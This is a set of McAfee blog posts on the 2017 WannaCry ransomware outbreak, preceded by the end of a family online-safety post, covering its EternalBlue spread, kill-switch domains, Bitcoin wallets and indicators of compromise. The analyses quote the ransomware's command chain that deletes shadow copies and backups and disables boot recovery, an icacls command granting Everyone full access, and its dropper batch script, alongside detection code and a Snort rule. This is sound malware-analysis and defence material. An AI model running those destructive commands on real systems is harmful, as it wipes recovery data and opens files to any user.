  • Each social media platform will have its own Help page which provides specific steps on how to do this.

Password Audit

  • Strong and complex passwords are essential to keeping your online information tight.
  • Ideally a password should have at least 8-10 characters and be a combination of letters – upper and lower case – numbers, and symbols.
  • Each online account should have its own password, too – which is a very overwhelming concept!
  • Consider using a password manager like the True Key app to help generate and manage all your passwords.

Ensure Your Kids Have A Plan If They Encounter Cyber Bullying

  • It is essential your kids know what to do if they either experience or witness cyber bullying.
  • Taking a screenshot is the absolute first course of action.
  • It is important that they don’t engage with the bully as that ‘feeds’ the bully’s sense of power.
  • Reporting the incident is the next step – to a parent, teacher, trusted adult friend, or even the police.

Protect Your – And Your Children’s – Digital Life

  • Comprehensive security software is an easy way to ensure your online life – and your children’s – is as secure as possible.
  • Not only will it guard you against viruses and threats, direct you away from risky websites and dangerous downloads, and protect your smartphones and tablets, it can also back up your important files.
  • McAfee Total Protection software comes with a 100% guarantee to protect you against viruses.

I know it all might seem like a lot of work, but teaching your kids about online privacy and safety needs to be a top priority for us all. Let’s get the statistics back under control and get those cyber safety discussions happening again. And make sure you’ve got something delicious planned for dinner because it’s the absolute best time to have these conversations!

Till next time!

Alex

PS: Better still, why not order pizza? It’s often cheaper online!

Further Analysis of WannaCry Ransomware
https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/
Sun, 14 May 2017 21:25:15 +0000

The post Further Analysis of WannaCry Ransomware appeared first on McAfee Blogs.

McAfee Labs has closely monitored the activity around the ransomware WannaCry. Many sources have reported on this attack and its behavior, including this post by McAfee’s Raj Samani and Christiaan Beek and this post by Steve Grobman. In the last 24 hours, we have learned more about this malware. These findings mainly concern the malware’s network propagation, Bitcoin activity, and differences in observed variants.

Malware network behavior

WannaCry uses the MS17-010 exploit to spread to other machines through NetBIOS. The malware contains exploits in its body that are used during the exploitation phase. These are related to CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0147, and CVE-2017-0148, all covered by the MS17-010 security bulletin.

In many reports we read that the malware generates a list of internal IPs. We found that the malware generates random IP addresses, not limited to the local network. The following is an example attempt at propagation:

With this, the malware can spread not only to other machines in the same network, but also across the Internet if sites allow NetBIOS packets from outside networks. This could be one reason for the widespread infection seen in this outbreak and why many people are unsure about the initial infection vector of the malware.

Another interesting characteristic of the malware is that once a machine with an open NetBIOS port is found, the malware will send three NetBIOS session setup packets to it. One has the proper IP of the machine being exploited, and the other two contain two IP addresses hardcoded in the malware body:

The preceding packet contains the IP of the machine being exploited. It uses the test network 192.168.0.0/24. The other two packets, below, contain different IPs that the malware has in its code:

This activity and the presence of two hardcoded IP addresses (192.168.56.20, 172.16.99.5) could be used to detect the exploit using network intrusion prevention systems.

Server message block (SMB) packets also contain the encrypted payload, which consists of exploit shellcode and the file launcher.dll. During our analysis, we found the malware is encrypted using a 4-byte XOR key, 0x45BF6313.

Encrypted payload with the key 0x45BF6313.

Decrypted launcher.dll payload.
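Decoding the SMB payload with the reported key, as an added example that is not from McAfee’s analysis: it applies the repeating 4-byte key 0x45BF6313 and checks the result for an MZ/PE header. The byte order in which the key is applied is not stated above, so the code tries little-endian and then big-endian (an assumption), and the encrypted input is a constructed buffer made by XOR-ing a fake PE header with the same key.

```python
"""XOR-decoding the WannaCry SMB payload with the key reported above.

Added example; not code from McAfee's analysis. The write-up states the
payload carried over SMB is XOR-encrypted with the 4-byte key 0x45BF6313
but not the byte order in which the key is applied, so recover_payload()
tries little-endian and then big-endian (an assumption). Because XOR is
its own inverse, the sample input is constructed here by encrypting a
fake PE header with the same key.
"""
import struct
from typing import Optional

XOR_KEY = 0x45BF6313  # key reported in the analysis above
DOS_STUB = b"This program cannot be run in DOS mode."


def xor_with_key(data: bytes, key: int, byteorder: str = "little") -> bytes:
    """Apply a repeating 4-byte XOR key; works for any input length."""
    key_bytes = key.to_bytes(4, byteorder)
    return bytes(b ^ key_bytes[i % 4] for i, b in enumerate(data))


def looks_like_pe(data: bytes) -> bool:
    """Plausibility check for a decoded Windows executable: the 'MZ' magic
    and an e_lfanew pointer (offset 0x3C) that lands on 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_payload(encrypted: bytes, key: int = XOR_KEY) -> Optional[bytes]:
    """Return the decoding that yields a PE image, or None if neither
    key byte order produces one (wrong key, or not a PE payload)."""
    for order in ("little", "big"):
        candidate = xor_with_key(encrypted, key, order)
        if looks_like_pe(candidate):
            return candidate
    return None


def build_fake_pe() -> bytes:
    """Constructed minimal MZ/PE header used only as sample input."""
    header = bytearray(0x80)
    header[:2] = b"MZ"
    header[0x4E:0x4E + len(DOS_STUB)] = DOS_STUB
    struct.pack_into("<I", header, 0x3C, 0x78)  # e_lfanew -> offset 0x78
    header[0x78:0x7C] = b"PE\x00\x00"
    # Three trailing bytes make the length a non-multiple of 4, which
    # exercises the key wrap-around in xor_with_key().
    return bytes(header) + b"\x90" * 3


# Constructed stand-in for the encrypted payload seen on the wire.
ENCRYPTED_SAMPLE = xor_with_key(build_fake_pe(), XOR_KEY)


if __name__ == "__main__":
    decoded = recover_payload(ENCRYPTED_SAMPLE)
    if decoded is None:
        print("no PE image recovered")
    else:
        print("recovered PE, DOS stub at offset", decoded.find(DOS_STUB))
```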

We also found the following x64 shellcode being transferred during network communication over SMB.

EternalBlue code.

DoublePulsar code.

Worm behavior

Machine A at left, Machine B at right. 

The infection flow to the vulnerable host (Machine B).

Kernel mode at left, user mode at right.

Infection using kernel exploit

In our analysis, we found that on infected machines the kernel-mode SMB driver srv2.sys is vulnerable and is exploited by the malware to spread over SMB.

A compromised srv2.sys will inject launcher.dll into the user-mode process lsass.exe, which acts as the loader for mssecsvc.exe. This DLL contains only one export, PlayGame:

The code simply extracts the ransomware dropper from the resource shown previously, and starts it using the function CreateProcess:

Injected launcher.dll in the lsass.exe address space.

Malware variants in the wild

As reported by several sources, the malware dropper contains code that checks two specific domains before executing its ransomware or network exploit code.

  • hxxp://www[dot]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com
  • hxxp://www[dot]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com

While looking for more samples in our malware database, we came across several other droppers (MD5: 509C41EC97BB81B0567B059AA2F50FE8) that did not exhibit this same behavior. These other droppers did not have the code to exploit machines through NetBIOS or to check for the kill-switch domain. With these samples, the ransomware code would be executed in all cases.

These samples were found in the wild, which means they are capable of infecting and spreading, but in a much less aggressive way. Once the ransomware infects a machine, it also tries to infect any network shares mounted as local disks. Anyone accessing these shares could execute the malware sample by mistake and infect themselves. This infection vector is not as effective as the network exploit but could nonetheless wreak havoc in a corporate environment.

We also examined the droppers (for example, MD5: DB349B97C37D22F5EA1D1841E3C89EB4) that had the exploit code to compare with the other samples. We found that this exploit-aware dropper is a wrapper around the other droppers.

Looking at the exploit-aware sample, we found that one of the resources contains a 3.4MB .exe file that is the same as the other type of droppers:

The preceding resource is extracted after the remote host is exploited, sent to the victim, and installed as a service. This event starts the infection on the remote machine.

File decryption

WannaCry offers free decryption for some random number of files in the folder C:\Intel\<random folder name>\f.wnry. We have seen 10 files decrypted for free.

In the first step, the malware checks the header of each encrypted file. If the check succeeds, it calls the decryption routine and decrypts all the files listed in C:\Intel\<random folder name>\f.wnry.

A code snippet of the header check:

The format of the encrypted file:

To decrypt all the files on an infected machine we need the file 00000000.dky, which contains the decryption keys. The decryption routine for the key and original file follows:

Bitcoin activity

WannaCry uses three Bitcoin wallets to receive payments from its victims. Looking at the payment activity for these wallets gives us an idea of how much money the attackers have made.

The current statistics as of May 13 show that not many people have paid to recover their files:

  • Wallet 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw
  • Wallet 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
  • Wallet 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

The attackers appear to have earned a little over BTC 15.44 (US$27,724.22). That is not much considering the number of infected machines, but these numbers are increasing and might become much higher in the next few days. It’s possible that the sinkholing of two sites may have helped slow things down:

  • hxxp://www[dot]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com
  • hxxp://www[dot]ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[dot]com

Multiple organizations across more than 90 countries have been impacted, according to reports.

We will update this blog as we learn more.

WannaCry: The Old Worms and the New
https://securingtomorrow.mcafee.com/executive-perspectives/wannacry-old-worms-new/
Sat, 13 May 2017 05:42:14 +0000

The post WannaCry: The Old Worms and the New appeared first on McAfee Blogs.

On the morning of Friday, May 12, multiple sources in Spain began reporting an outbreak of the ransomware now identified as WannaCry.

Upon learning of these incidents, McAfee immediately began working to analyze samples of the ransomware and develop mitigation guidance and detection updates for its customers.

By Friday afternoon, McAfee’s Global Threat Intelligence system was updated to identify all known WannaCry samples and the company had delivered DAT signature updates to all its customers.

McAfee urges all its customers to ensure these DAT updates have been applied, and furthermore ensure that security updates are applied for all the software solutions they use. For more information, read this Knowledge Center article.

This week’s attacks leveraging the WannaCry ransomware were the first time we’ve seen an attack combine worm tactics with the business model of ransomware. The weaponization of the EternalBlue exploit, made public weeks ago, together with thousands of unpatched MS17-010 Windows OS vulnerabilities, enabled WannaCry to infect hundreds of thousands of computers across industries and continents within just a day. Furthermore, these attacks accomplished all this with little or no human involvement, which is not typically the case in other ransomware campaigns.

A hybrid of the proven, less the human

WannaCry’s success comes down to its ability to amplify one attack through the vulnerabilities of many machines on the network. The impact of the attack is much greater than what we’ve seen from traditional data ransomware attacks.

Almost all of the ransomware we see in the wild today attacks individual users, typically through spear-phishing: the victim receives an email that appears to come from a legitimate source and is lured into clicking a link or opening an attachment that downloads or executes malicious code on his or her system. But it only impacts that one victim’s computer.

If you think back to the late 90s and early 2000s, when we had Code Red, NIMDA and SQL Slammer, those worms spread very rapidly because they didn’t require a human to take any action in order to activate the malware on the machine. This week’s attacks did something very similar.

We’re still working to determine how a “patient zero” machine became infected, but, once it was, if other machines hadn’t received the MS-17-010 vulnerability patch, they were infected over their network.

Instead of stealing data or damaging other machines, the malware executed a classic ransomware attack, encrypting files and demanding a ransom payment. The attack essentially combined two techniques to produce something that was highly impactful.

With WannaCry, if the configuration of machines within an organization possessed the Microsoft vulnerability (addressed by Microsoft in March), the ransomware could infect one machine and then move very rapidly to spread and impact many other machines that still had not been patched.

What we’ve typically seen with cybercrime is that when any technique is shown to be effective, there are almost always copycats. Given that this appears to have been quite an effective attack, it would be very reasonable for other attackers to look for other opportunities. One of the things that makes that difficult is you need to have a vulnerability in software that has characteristics that enable worm-like behavior.

What’s unique here is that there is a critical vulnerability that Microsoft has patched, and an active exploit that ended up in the public domain, both of which created the opportunity and blueprint for the attacker to create this type of malicious ransomware worm capability.

Open for exploit

In the late 90s, it was common practice to leave all sorts of software running on machines even if it wasn’t used. For instance, one of the worms in the 90s took advantage of a vulnerability in a print server which was by default included on all servers even if there wasn’t a printer attached to the configuration of systems. That could enable a worm to connect to that printer port on all of the servers on a network, creating a worm propagation scenario that infected system after system.

A common practice for addressing this since those days is a best practice known as “least privilege,” which allows an application or service to run only the things on a machine or network that that entity needs to complete a task or function specific to its particular role. Least privilege has reduced the chances of the traditional worm scenario, but unpatched vulnerabilities mimic this “open” element available for exploit, particularly if such vulnerabilities enable things such as file transfer or sharing across systems.

It would be difficult to orchestrate attacks such as the WannaCry campaign, without all the unpatched vulnerabilities, the publicly released exploit, and a set of proven ransomware technologies and tactics at the attacker’s disposal.

To patch or not to patch

WannaCry should remind IT of the criticality to apply patches quickly. Part of the reason IT organizations hesitate to patch or run an internal quality assurance process is to ensure that there aren’t software incompatibility issues. One way I like to think about this is that whenever a patch must be applied, there is a risk to applying a patch, and a risk to not applying a patch. Part of what IT managers need to understand and assess is what those two risks mean to their organizations.

By delaying deployment of a patch, they can mitigate risk related to application compatibility. By delaying a patch, they are increasing the risk of being compromised by a threat exploiting a vulnerability. IT teams need to understand for each patch, what those levels of risk are, and then make a decision that minimizes risk for an organization.

Events such as WannaCry have the potential to shift the calculus of this analysis. One of the problems we often see in security is that the lack of an attack is sometimes interpreted as having a good defense. Companies that have become lax in applying patches may not have experienced any attacks that take advantage of those vulnerabilities. This can reinforce the notion that it’s okay to delay patching.

This episode should remind organizations that they really do need an aggressive patching plan in order to mitigate the vulnerabilities in their environment.

Why the hospitals?

Hospitals fall into a category I think of as “soft targets,” meaning hospitals generally focus on patient care as their top priority, as opposed to having the best cyber defenders on staff and best cyber defense technologies in place.

The reason for this is that, traditionally, there was very little incentive for cybercriminals to attack a hospital. They could potentially steal patient records or other data, but the total value of data from a hospital would typically be less than that of the bulk data stolen from other industries such as financial services.

What ransomware has done as a criminal business model is provide an incentive to attack any organization. Given that criminals are demanding a ransom, it’s far easier to exploit an organization with weaker cyber defenses than an organization with stronger cyber defenses, which is why we’ve seen hospitals, schools, municipal police departments, and universities become victims of ransomware over the last year. While we’re now starting to see the targeting of “harder” organizations as well, at least for now, there are a lot of opportunities for criminals to continue to target these soft target organizations.

What next?

Although this attack is something new, and something we need to be thoughtful about, whenever we see such a vulnerability occur in the wild together with a published exploit that cybercriminals could use, we should always expect and be prepared for this kind of attack, and for many copycat attacks to follow soon after.

 

For French translation click here.

For German translation click here.

“WannaCry” Ransomware Spreads Like Wildfire, Attacks Over 150 Countries
https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/wannacry-ransomware-attacks/
Sat, 13 May 2017 00:32:14 +0000

Update: The McAfee team has developed a tool that can be used in an effort to recover files that have been attacked by WannaCry ransomware. Learn about it here.

Recently, a ransomware attack emerged that is worthy of tears. WannaCry ransomware hit the scene, spreading like wildfire across 150 countries and infecting more than 250,000 machines, which includes a massive takedown of 16 UK NHS medical centers in just one day. Other major countries impacted include Spain, Russia, Ukraine, India, China, Italy, and Egypt.

Now, how is this massive attack possible? Our experts say the ransomware attack exploits the Server Message Block (SMB) critical vulnerability, also known as the Equation Group’s ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers a couple of weeks ago. Basically, the attacker can use just one exploit to gain remote access into a system. Once access is gained, the cybercriminal encrypts data, giving the files the extension “.WCRY.” The decryptor tool it drops can hit users in multiple countries at once and translates its ransom note into the appropriate language for each country. The ransom is said to demand $300 to decrypt the files.

The good news is, consumers don’t have to worry about this attack affecting their personal data, as it leverages a flaw within the way organizations’ networks allow devices to talk to each other.

Furthermore, by Friday afternoon, McAfee delivered detection updates to its products to ensure customers would be protected from all the known versions of the WannaCry ransomware.

However, this attack does act as a reminder for consumers to prepare for personal ransomware attacks. In order to stay prepared and keep your personal data secure, follow these tips:

- Be careful what you click on. This malware was distributed by phishing emails. You should only click on emails that you are sure came from a trusted source. Click here to learn more about phishing emails.

- Back up your files. Always make sure your files are backed up. That way, if they become compromised in a ransomware attack, you can wipe your disk drive clean and restore the data from the backup.

- Update your devices. There are a few lessons to take away from WannaCry, but making sure your operating system is up-to-date needs to be near the top of the list. The reason is simple: nearly every software update contains security improvements that help secure your computer and remove the means for ransomware variants to infect a device.

- Schedule automatic updates. It’s always a good practice to set your home systems to apply critical Windows Security Updates automatically. That way, whenever there is a vulnerability, you receive the patch immediately.

- Apply any Windows security patches that Microsoft has sent you. If you are using an older version of Microsoft’s operating systems, such as Windows XP or Windows 8, click here to download emergency security patches from Microsoft.

- Keep security solutions up-to-date. Many security products are automatically updated. Take McAfee, for example: our customers will be protected from this ransomware as soon as they connect to the Internet and update their security software. Plus, as new variants of this ransomware arise, we will continuously update our software to keep them protected.

If you are not currently a McAfee customer, you can get protection here. And stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

An Analysis of the WannaCry Ransomware Outbreak
https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
Fri, 12 May 2017 22:07:01 +0000

Charles McFarland was a coauthor of this blog.

Over the course of Friday, May 12, we received multiple reports of organizations across multiple verticals falling victim to a ransomware attack. By Friday afternoon, McAfee’s Global Threat Intelligence system had been updated to identify all known WannaCry samples and the company had delivered DAT signature updates to all its customers. But the wave of attacks ranks as one of the more notable cyber events in history.

Once infected, the encrypted files contain the file extension .WNCRYT. Victims’ computers then proceed to display the following message with a demand for $300 to decrypt the files.

Observations

Exploit MS17-010:

The malware uses the MS17-010 exploit to distribute itself. MS17-010 is an SMB vulnerability that allows remote code execution. Details at https://technet.microsoft.com/en-us/library/security/ms17-010.aspx. Exploit code is available on multiple sites, including this example: https://github.com/RiskSense-Ops/MS17-010/blob/master/exploits/eternalblue/ms17_010_eternalblue.rb.

This exploit is also known as the Equation Group’s ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers a couple of weeks ago.

With MS17-010, the attacker can use just one exploit to get remote access with system privileges, meaning both steps (Remote Code Execution + Local Privilege Escalation combined) use just one bug in the SMB protocol. Analyzing the exploit code in Metasploit, a popular hacking tool, we see the exploit uses KI_USER_SHARED_DATA, which has a fixed memory address (0xffdff000 on 32-bit Windows) to copy the payload and transfer control to it later.

Because the attacker gains control of a victim’s PC remotely, with system privileges and without any user action, control of a single system inside a network is enough to spray the malware across that network: the compromised system spreads the ransomware to every Windows system that is affected by this vulnerability and not patched for MS17-010.

Behavior

Using the following command line, the ransomware removes the Volume Shadow Copies and backups:

Cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet

File size of the ransomware is 3.4MB (3514368 bytes).

The authors called the ransomware WANNACRY, the string hardcoded in the samples.

The ransomware writes itself into a folder with a random name under ProgramData with the filename tasksche.exe, or into the C:\Windows\ folder with the filenames mssecsvc.exe and tasksche.exe.

Examples

C:\ProgramData\lygekvkj256\tasksche.exe

C:\ProgramData\pepauehfflzjjtl340\tasksche.exe

C:\ProgramData\utehtftufqpkr106\tasksche.exe

c:\programdata\yeznwdibwunjq522\tasksche.exe

C:\ProgramData\uvlozcijuhd698\tasksche.exe

C:\ProgramData\pjnkzipwuf715\tasksche.exe

C:\ProgramData\qjrtialad472\tasksche.exe

c:\programdata\cpmliyxlejnh908\tasksche.exe

 

The ransomware grants full access to all files by using the command:

Icacls . /grant Everyone:F /T /C /Q
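The shadow-copy deletion chain and the icacls command above are the ransomware’s own. As an added example, not code from the original post or from McAfee, the following Python turns those two behaviors into a detection check that runs over process-creation events of the kind an EDR or Sysmon feed produces. The event records, host names and the benign "vssadmin list shadows" control case are constructed for the example.

```python
"""Flag backup-tampering and ACL-weakening command lines of the kind
shown in the WannaCry analysis (vssadmin/wmic/bcdedit/wbadmin and
icacls Everyone:F). Added example; the events below are constructed."""
import re
from typing import Dict, List

# Each pattern maps to a human-readable reason. Matching is case-insensitive
# and tolerant of extra whitespace, because the sample chains commands with '&'.
TAMPER_PATTERNS = {
    "shadow-copy deletion (vssadmin)":
        re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows", re.I),
    "shadow-copy deletion (wmic)":
        re.compile(r"wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I),
    "boot failure policy suppressed (bcdedit)":
        re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures", re.I),
    "boot recovery disabled (bcdedit)":
        re.compile(r"bcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no", re.I),
    "backup catalog deletion (wbadmin)":
        re.compile(r"wbadmin(?:\.exe)?\s+delete\s+catalog", re.I),
    "ACL opened to Everyone (icacls)":
        re.compile(r"icacls(?:\.exe)?\s+\S+\s+/grant\s+Everyone:F", re.I),
}


def classify_command_line(cmdline: str) -> List[str]:
    """Return the list of tamper reasons that match one command line."""
    return [reason for reason, rx in TAMPER_PATTERNS.items() if rx.search(cmdline)]


def scan_process_events(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Return one alert per event whose command line matches at least one pattern.
    Each event is a dict with 'host', 'image' and 'cmdline' keys."""
    alerts = []
    for ev in events:
        reasons = classify_command_line(ev["cmdline"])
        if reasons:
            alerts.append({"host": ev["host"], "image": ev["image"], "reasons": reasons})
    return alerts


# Constructed sample telemetry: the first two events reproduce the command
# lines from the analysis, the third is ordinary administration.
SAMPLE_EVENTS = [
    {"host": "ws-17", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": ("Cmd /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & "
                 "bcdedit /set {default} bootstatuspolicy ignoreallfailures & "
                 "bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet")},
    {"host": "ws-17", "image": r"C:\Windows\System32\icacls.exe",
     "cmdline": "Icacls . /grant Everyone:F /T /C /Q"},
    {"host": "srv-bk", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin list shadows"},
]

if __name__ == "__main__":
    for alert in scan_process_events(SAMPLE_EVENTS):
        print(alert["host"], alert["image"], "->", "; ".join(alert["reasons"]))
```

The patterns are deliberately broader than the exact WannaCry string so that the same check fires on other ransomware families that delete shadow copies or disable recovery; the benign "vssadmin list shadows" event shows that read-only use of the same tools does not alert.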

 

Using a batch script for operations:

176641494574290.bat

Content of batch file (hash fefe6b30d0819f1a1775e14730a10e0e):

@echo off
echo SET ow = WScript.CreateObject("WScript.Shell")> m.vbs
echo SET om = ow.CreateShortcut("C:\@WanaDecryptor@.exe.lnk")>> m.vbs
echo om.TargetPath = "C:\@WanaDecryptor@.exe">> m.vbs
echo om.Save>> m.vbs
cscript.exe //nologo m.vbs
del m.vbs
del /a %0

Content of m.vbs:

SET ow = WScript.CreateObject("WScript.Shell")
SET om = ow.CreateShortcut("C:\@WanaDecryptor@.exe.lnk")
om.TargetPath = "C:\@WanaDecryptor@.exe"
om.Save


Indicators of compromise

Hashes

dff26a9a44baa3ce109b8df41ae0a301d9e4a28ad7bd7721bbb7ccd137bfd696

201f42080e1c989774d05d5b127a8cd4b4781f1956b78df7c01112436c89b2c9

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

c365ddaa345cfcaff3d629505572a484cff5221933d68e4a52130b8bb7badaf9

09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa

b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

aae9536875784fe6e55357900519f97fee0a56d6780860779a36f06765243d56

21ed253b796f63b9e95b4e426a82303dfac5bf8062bfe669995bde2208b360fd

2372862afaa8e8720bc46f93cb27a9b12646a7cbc952cc732b8f5df7aebb2450

24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c

f8812f1deb8001f3b7672b6fc85640ecb123bc2304b563728e6235ccbe782d85

4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

4b76e54de0243274f97430b26624c44694fbde3289ed81a160e0754ab9f56f32

9cc32c94ce7dc6e48f86704625b6cdc0fda0d2cd7ad769e4d0bb1776903e5a13

78e3f87f31688355c0f398317b2d87d803bd87ee3656c5a7c80f0561ec8606df

be22645c61949ad6a077373a7d6cd85e3fae44315632f161adc4c99d5a8e6844

5d26835be2cf4f08f2beeff301c06d05035d0a9ec3afacc71dff22813595c0b9

76a3666ce9119295104bb69ee7af3f2845d23f40ba48ace7987f79b06312bbdf

fc626fe1e0f4d77b34851a8c60cdd11172472da3b9325bfe288ac8342f6c710a

eeb9cd6a1c4b3949b2ff3134a77d6736b35977f951b9c7c911483b5caeb1c1fb

043e0d0d8b8cda56851f5b853f244f677bd1fd50f869075ef7ba1110771f70c2

57c12d8573d2f3883a8a0ba14e3eec02ac1c61dee6b675b6c0d16e221c3777f4

ca29de1dc8817868c93e54b09f557fe14e40083c0955294df5bd91f52ba469c8

f7c7b5e4b051ea5bd0017803f40af13bed224c4b0fd60b890b6784df5bd63494

3e6de9e2baacf930949647c399818e7a2caea2626df6a468407854aaa515eed9

9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640

5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec

12d67c587e114d8dde56324741a8f04fb50cc3160653769b8015bc5aec64d20b

85ce324b8f78021ecfc9b811c748f19b82e61bb093ff64f2eab457f9ef19b186

3f3a9dde96ec4107f67b0559b4e95f5f1bca1ec6cb204bfe5fea0230845e8301

 

IP Addresses

  • 197.231.221.221:9001
  • 128.31.0.39:9191
  • 149.202.160.69:9001
  • 46.101.166.19:9090
  • 91.121.65.179:9001
  • 2.3.69.209:9001
  • 146.0.32.144:9001
  • 50.7.161.218:9001
  • 217.79.179.177:9001
  • 213.61.66.116:9003
  • 212.47.232.237:9001
  • 81.30.158.223:9001
  • 79.172.193.32:443
  • 38.229.72.16:443

Domains

  • iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com (sinkholed)
  • Rphjmrpwmfv6v2e[dot]onion
  • Gx7ekbenv2riucmf[dot]onion
  • 57g7spgrzlojinas[dot]onion
  • xxlvbrloxvriy2c5[dot]onion
  • 76jdd2ir2embyv47[dot]onion
  • cwwnhwhlz52maqm7[dot]onion

Filenames

  • @Please_Read_Me@.txt
  • @WanaDecryptor@.exe
  • @WanaDecryptor@.exe.lnk
  • Please Read Me!.txt (Older variant)
  • C:\WINDOWS\tasksche.exe
  • C:\WINDOWS\qeriuwjhrf
  • 131181494299235.bat
  • 176641494574290.bat
  • 217201494590800.bat
  • [0-9]{15}.bat #regex
  • !WannaDecryptor!.exe.lnk
  • 00000000.pky
  • 00000000.eky
  • 00000000.res
  • C:\WINDOWS\system32\taskdl.exe
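As an added example that is not part of the original post, the following Python matches host telemetry against the file-name indicators listed above, including the random-named ProgramData folder from the Examples list and the 15-digit .bat regex, plus a DNS query for the sinkholed domain. The hosts and events are constructed.

```python
"""Match host telemetry against the WannaCry file-name and domain indicators.
Added example, not code from the original post; the events are constructed."""
import re
from collections import defaultdict
from typing import Dict, List, Tuple

# Patterns derived from the indicator lists. Paths are matched case-insensitively
# because the post shows both C:\ProgramData\... and c:\programdata\... spellings.
FILE_PATTERNS = {
    "tasksche.exe in random-named ProgramData folder":
        re.compile(r"^[a-z]:\\programdata\\[a-z]+[0-9]+\\tasksche\.exe$", re.I),
    "tasksche.exe or mssecsvc.exe in Windows folder":
        re.compile(r"^[a-z]:\\windows\\(?:tasksche|mssecsvc)\.exe$", re.I),
    "15-digit batch dropper":
        re.compile(r"(?:^|\\)[0-9]{15}\.bat$"),
    "ransom note":
        re.compile(r"(?:^|\\)(?:@Please_Read_Me@\.txt|Please Read Me!\.txt)$", re.I),
    "decryptor binary or shortcut":
        re.compile(r"(?:^|\\)(?:@WanaDecryptor@\.exe(?:\.lnk)?|!WannaDecryptor!\.exe\.lnk)$", re.I),
    "key material files":
        re.compile(r"(?:^|\\)00000000\.(?:pky|eky|res)$"),
}
# The sinkholed domain from the Domains list, written out so it can be compared.
SINKHOLE_DOMAIN = "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"


def match_path(path: str) -> List[str]:
    """Return the indicator labels a file path matches (empty list if none)."""
    return [label for label, rx in FILE_PATTERNS.items() if rx.search(path)]


def match_dns(qname: str) -> bool:
    """True if a DNS query name is the sinkholed domain (case and trailing dot ignored)."""
    return qname.rstrip(".").lower() == SINKHOLE_DOMAIN


def triage(events: List[Tuple[str, str, str]]) -> Dict[str, List[Tuple[str, str]]]:
    """Group (host, kind, value) events into indicator hits per host.
    kind is "file" for a file-create path or "dns" for a query name."""
    hits = defaultdict(list)
    for host, kind, value in events:
        if kind == "file":
            for label in match_path(value):
                hits[host].append((value, label))
        elif kind == "dns" and match_dns(value):
            hits[host].append((value, "query for sinkholed domain"))
    return dict(hits)


# Constructed telemetry: ws-17 shows the dropper, a note and the sinkhole
# lookup; ws-22 has look-alike paths that must not match.
SAMPLE_EVENTS = [
    ("ws-17", "file", r"C:\ProgramData\lygekvkj256\tasksche.exe"),
    ("ws-17", "file", r"C:\Users\bob\Desktop\176641494574290.bat"),
    ("ws-17", "file", r"C:\Users\bob\Documents\@Please_Read_Me@.txt"),
    ("ws-17", "dns", "iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com"),
    ("ws-22", "file", r"C:\Windows\System32\taskhost.exe"),
    ("ws-22", "file", r"C:\ProgramData\Microsoft\tasksche.exe"),
]

if __name__ == "__main__":
    for host, host_hits in triage(SAMPLE_EVENTS).items():
        for value, label in host_hits:
            print(f"{host}: {label}: {value}")
```

The ProgramData pattern requires letters followed by digits in the folder name, which is the shape of every path in the Examples list, so a legitimate vendor folder such as C:\ProgramData\Microsoft does not match even when it contains a file of the same name.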

 

Bitcoin Wallets

  • 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn
  • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94
  • 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

Here is a Snort rule submitted to SANS by Marco Novak:

alert tcp $HOME_NET 445 -> any any (msg:"ET EXPLOIT Possible ETERNALBLUE MS17-010 Echo Response"; flow:from_server,established; content:"|00 00 00 31 ff|SMB|2b 00 00 00 00 98 07 c0|"; depth:16; fast_pattern; content:"|4a 6c 4a 6d 49 68 43 6c 42 73 72 00|"; distance:0; flowbits:isset,ETPRO.ETERNALBLUE; classtype:trojan-activity; sid:2024218; rev:2;)

And other Snort rules from Emerging Threats:

(http://docs.emergingthreats.net/bin/view/Main/2024218)

